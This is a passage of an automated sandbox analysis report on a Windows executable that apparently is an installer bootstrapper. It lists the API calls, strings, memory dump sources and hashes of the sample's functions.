                                                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 008A3264
                                                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 008A32D8
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A32E3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A3498: SysAllocString.OLEAUT32(?), ref: 008A34AD
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$AllocVariant$ClearFreeInit
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 347726874-0
APIs
  • Part of subcall function 0086F96C: RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,00864CA5,?,?,00000001), ref: 0086F9BC
• CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000001,00000000,?,?,?), ref: 00864D0C
Strings
• Unable to get resume command line from the registry, xrefs: 00864CAB
• Failed to get current process path., xrefs: 00864CCA
• Failed to re-launch bundle process after RunOnce: %ls, xrefs: 00864CF6
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
Similarity
• API ID: Close$Handle
• String ID: Failed to get current process path.$Failed to re-launch bundle process after RunOnce: %ls$Unable to get resume command line from the registry
• API String ID: 187904097-642631345
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00898A56,00000000,00000000,?,00898859,00898A56,00000000,00000000,00000000,?,00898A56,00000006,FlsSetValue), ref: 008988E4
• GetLastError.KERNEL32(?,00898859,00898A56,00000000,00000000,00000000,?,00898A56,00000006,FlsSetValue,008C2404,008C240C,00000000,00000364,?,00896230), ref: 008988F0
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00898859,00898A56,00000000,00000000,00000000,?,00898A56,00000006,FlsSetValue,008C2404,008C240C,00000000), ref: 008988FE
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
APIs
• GetLastError.KERNEL32(?,00000000,00891AEC,00000000,80004004,?,00891DF0,00000000,80004004,00000000,00000000), ref: 00896162
• SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 008961CA
• SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 008961D6
• _abort.LIBCMT ref: 008961DC
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
Similarity
• API ID: ErrorLast$_abort
• String ID:
• API String ID: 88804580-0
APIs
• EnterCriticalSection.KERNEL32(?), ref: 00867441
• LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 008674A8
Strings
• Failed to get value as numeric for variable: %ls, xrefs: 00867497
• Failed to get value of variable: %ls, xrefs: 0086747B
Memory Dump Source
• Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
Similarity
• API ID: CriticalSection$EnterLeave
• String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls
• API String ID: 3168844106-4270472870
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 008675B6
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 0086761D
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to get value as version for variable: %ls, xrefs: 0086760C
                                                                                                                                                                                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 008675F0
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls
                                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-1851729331
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5788036e7e3625bf2c3547be2928582d89a55bb4f951bf99293142c5dda44e29
                                                                                                                                                                                                                                                                                                  • Instruction ID: 37d0aa0a0eb892e6ecd278744299746f8de17666cf05c161fcf4853698bad302
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5788036e7e3625bf2c3547be2928582d89a55bb4f951bf99293142c5dda44e29
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F01F232944529FBCF125F88CC0DA9E3B24FF21728F024160FD04EA221D3369E209BD5
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,00000006,?,00869897,00000000,?,00000000,00000000,00000000,?,008696D6,00000000,?,00000000,00000000), ref: 00867545
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,00000000,?,00869897,00000000,?,00000000,00000000,00000000,?,008696D6,00000000,?,00000000), ref: 0086759B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to copy value of variable: %ls, xrefs: 0086758A
                                                                                                                                                                                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 0086756B
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                  • String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls
                                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-2936390398
                                                                                                                                                                                                                                                                                                  • Opcode ID: ea54cb5e2f947483d4271d55c1c52f819ed9a3f3d1fe85a92d12f4b28bd41024
                                                                                                                                                                                                                                                                                                  • Instruction ID: 347bf1eee1b86632f493bb59e97791e2f5995f2aab20d9fcc7aad949e50de503
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea54cb5e2f947483d4271d55c1c52f819ed9a3f3d1fe85a92d12f4b28bd41024
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2F08C32940228BBDF126F94CC0999E3F68FF06365F018160FD15E6221C7369E209BD1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0088E788
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0088E797
                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 0088E7A0
                                                                                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 0088E7AD
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: db0603c71beaef41fc876cbf4e6a38d1ead5db2b567325aff8fecd751b23fd11
                                                                                                                                                                                                                                                                                                  • Instruction ID: df4f442ab779faa5a89ab3cfc7873e9051208ccaac61b1e30367c20ed188335c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db0603c71beaef41fc876cbf4e6a38d1ead5db2b567325aff8fecd751b23fd11
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CF07A70C1020CEBDF00DBA4D949A9EBBF8FF08201F514895A401E6211E734AA048B61
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 008A0DD7
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                                                                                  • String ID: regutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3535843008-955085611
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1aabba4a13f41626a4bfc84a2f6c2f169890908b173779a8ae83afb90eb469f4
                                                                                                                                                                                                                                                                                                  • Instruction ID: db3a55d2233216717b9d0c7338786c85dddd6b3bf0efb0926274ee87d96e73e5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1aabba4a13f41626a4bfc84a2f6c2f169890908b173779a8ae83afb90eb469f4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0541C433D01529EBFB318AE8CC04BAE7661FB02760F258364F914EAA50D7759D509FD1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0F6C: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,008CAAA0,00000000,?,008A57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008A0F80
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,00000000,00000000,00000101), ref: 008A48FC
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                                                                                  • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 008A112B
                                                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 008A1163
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: QueryValue
                                                                                                                                                                                                                                                                                                  • String ID: regutil.cpp
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(008AB518,00000000,00000006,00000001,comres.dll,?,00000000,?,00000000,?,?,00000000,00000006,?,comres.dll,?), ref: 008967A3
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008967BF
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                                                                                  • String ID: comres.dll
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A8E44: lstrlenW.KERNEL32(00000100,?,?,?,008A9217,000002C0,00000100,00000100,00000100,?,?,?,00887D87,?,?,000001BC), ref: 008A8E69
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,008AB500,wininet.dll,?), ref: 008A907A
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,008AB500,wininet.dll,?), ref: 008A9087
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0F6C: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,008CAAA0,00000000,?,008A57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008A0F80
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0E4F: RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,00888E1B), ref: 008A0EAA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0E4F: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00888E1B,00000000), ref: 008A0EC8
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Close$EnumInfoOpenQuerylstrlen
                                                                                                                                                                                                                                                                                                  • String ID: wininet.dll
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A8E44: lstrlenW.KERNEL32(00000100,?,?,?,008A9217,000002C0,00000100,00000100,00000100,?,?,?,00887D87,?,?,000001BC), ref: 008A8E69
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000000,?), ref: 008A9483
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000,00000000,?), ref: 008A949D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,0087061A,?,00000000,00020006), ref: 008A0C0E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A14F4: RegSetValueExW.ADVAPI32(00020006,008B0D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0086F335,00000000,?,00020006), ref: 008A1527
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A14F4: RegDeleteValueW.ADVAPI32(00020006,008B0D10,00000000,?,?,0086F335,00000000,?,00020006,?,008B0D10,00020006,00000000,?,?,?), ref: 008A1557
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A14A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,0086F28D,008B0D10,Resume,00000005,?,00000000,00000000,00000000), ref: 008A14BB
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Value$Close$CreateDeletelstrlen
                                                                                                                                                                                                                                                                                                  • String ID: %ls\%ls
                                                                                                                                                                                                                                                                                                  • API String ID: 3924016894-2125769799
                                                                                                                                                                                                                                                                                                  • Opcode ID: ded7a632aed5782d006daa2aa5972a2aa1d381c3514b480aa8f31ad14835bec4
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1bb238dbf6b1ee9e9676782b0a780d405f7ef46d9d7dce1f2f188982acb832ae
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ded7a632aed5782d006daa2aa5972a2aa1d381c3514b480aa8f31ad14835bec4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA313A72C0212EBFAF129F98CC4199EBBB9FB09710B014166E944B6521D7318E21EB91
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _memcpy_s
                                                                                                                                                                                                                                                                                                  • String ID: crypt32.dll$wininet.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 2001391462-82500532
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0a577301c118372d2892c416fe6de27a87ac0f602b793f0d7537625e387e7096
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE118E71600219ABCB08DE59CD859AFBF69EF85390B15802AFD058B311D231EA10DBE0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00020006,008B0D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0086F335,00000000,?,00020006), ref: 008A1527
                                                                                                                                                                                                                                                                                                  • RegDeleteValueW.ADVAPI32(00020006,008B0D10,00000000,?,?,0086F335,00000000,?,00020006,?,008B0D10,00020006,00000000,?,?,?), ref: 008A1557
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Value$Delete
                                                                                                                                                                                                                                                                                                  • String ID: regutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1738766685-955085611
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4f47ab5560e4d4fe86ff1f46a16ea44ea7174e21b175c5d9a766eb26aeb0158d
                                                                                                                                                                                                                                                                                                  • Instruction ID: c8f511cee8acd7aa199401e4abca7b0c64c650169ba4dd576c497a3267a0119c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f47ab5560e4d4fe86ff1f46a16ea44ea7174e21b175c5d9a766eb26aeb0158d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D11E336D1153AB7EF214A948C0AFAA7A25FB46770F150221BD12EA950E731CD20A7E0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,IGNOREDEPENDENCIES,00000000,?,?,00887691,00000000,IGNOREDEPENDENCIES,00000000,?,008AB518), ref: 0086DE04
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • IGNOREDEPENDENCIES, xrefs: 0086DDBB
                                                                                                                                                                                                                                                                                                  • Failed to copy the property value., xrefs: 0086DE38
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to copy the property value.$IGNOREDEPENDENCIES
                                                                                                                                                                                                                                                                                                  • API String ID: 1825529933-1412343224
                                                                                                                                                                                                                                                                                                  • Opcode ID: d9b10ca7d5aba5836c0a81d60320bf5f493656db7c7166e6d4aadbd30bdfe309
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7db4917b9d2be96a2f1fcb4fe6e2c41c851d829d47ed26b9f7b60e8824ddd366
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9b10ca7d5aba5836c0a81d60320bf5f493656db7c7166e6d4aadbd30bdfe309
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB11A032B04315AFDB115F58DC84FAAB7A6FF54324F264179EA18EF292C771A850CB81
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(20000004,00000000,00000000,00000000,00000000,00000000,?,?,00878E97,?,00000001,20000004,00000000,00000000,?,00000000), ref: 008A566E
                                                                                                                                                                                                                                                                                                  • SetNamedSecurityInfoW.ADVAPI32(00000000,?,000007D0,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00878E97,?), ref: 008A5689
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: InfoNamedSecuritySleep
                                                                                                                                                                                                                                                                                                  • String ID: aclutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2352087905-2159165307
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LCMapStringW.KERNEL32(0000007F,00000000,00000000,008770E8,00000000,008770E8,00000000,00000000,008770E8,00000000,00000000,00000000,?,00862318,00000000,00000000), ref: 008615D0
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00862318,00000000,00000000,008770E8,00000200,?,008A52B2,00000000,008770E8,00000000,008770E8,00000000,00000000,00000000), ref: 008615DA
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastString
                                                                                                                                                                                                                                                                                                  • String ID: strutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3728238275-3612885251
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 008757D9
                                                                                                                                                                                                                                                                                                  • CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?), ref: 00875833
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to initialize COM on cache thread., xrefs: 008757E5
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Similarity
